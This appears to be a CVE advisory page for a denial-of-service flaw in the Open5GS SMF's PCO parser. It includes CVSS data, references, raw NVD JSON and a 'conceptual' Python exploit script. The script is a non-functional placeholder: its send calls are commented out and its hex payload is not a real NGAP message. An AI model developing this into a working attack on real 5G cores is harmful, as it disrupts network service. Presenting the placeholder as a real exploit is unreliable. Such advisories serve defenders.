CVE-2025-56568

Description

Assertion failure vulnerability in the PCO (Protocol Configuration Options) parser in the SMF (Session Management Function) component of Open5GS before v2.7.5 allows remote attackers to cause denial of service via specially crafted NGAP messages containing malformed length fields in protocol configuration data.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open5GS < 2.7.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Conceptual PoC for CVE-2025-56568
# This script demonstrates the logic for sending a malformed NGAP message.
# Note: Real NGAP communication runs over SCTP and requires ASN.1 encoding.

TARGET_IP = "192.168.1.100"
TARGET_PORT = 38412  # Default SCTP port for NGAP

# Malformed payload: Simulating an NGAP message with a bad PCO length field.
# In a real scenario, this hex stream would be a valid NGAP PDU structure
# with specific length corruptions in the PCO container.
malformed_payload = b"\x00\x0f\x40\x00\x00\x00\x02\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x01"

def send_exploit():
    print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
    
    # Since NGAP uses SCTP, standard TCP/UDP sockets won't work directly.
    # This is a placeholder for the transport mechanism.
    try:
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((TARGET_IP, TARGET_PORT))
        # sock.send(malformed_payload)
        print("[!] Payload sent (Simulated). Check target for crash.")
        # sock.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56568
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56568
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56568/
[4] VulDB https://vuldb.com/cve/CVE-2025-56568
[5] https://github.com/open5gs/open5gs/commit/d7707879c943d2c952235382154d835b5849d54e
[6] https://github.com/open5gs/open5gs/issues/3969

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56568", "sourceIdentifier": "[email protected]", "published": "2026-04-30T20:16:23.220", "lastModified": "2026-05-04T18:16:25.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Assertion failure vulnerability in the PCO (Protocol Configuration Options) parser in the SMF (Session Management Function) component of Open5GS before v2.7.5 allows remote attackers to cause denial of service via specially crafted NGAP messages containing malformed length fields in protocol configuration data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/commit/d7707879c943d2c952235382154d835b5849d54e", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/3969", "source": "[email protected]"}]}}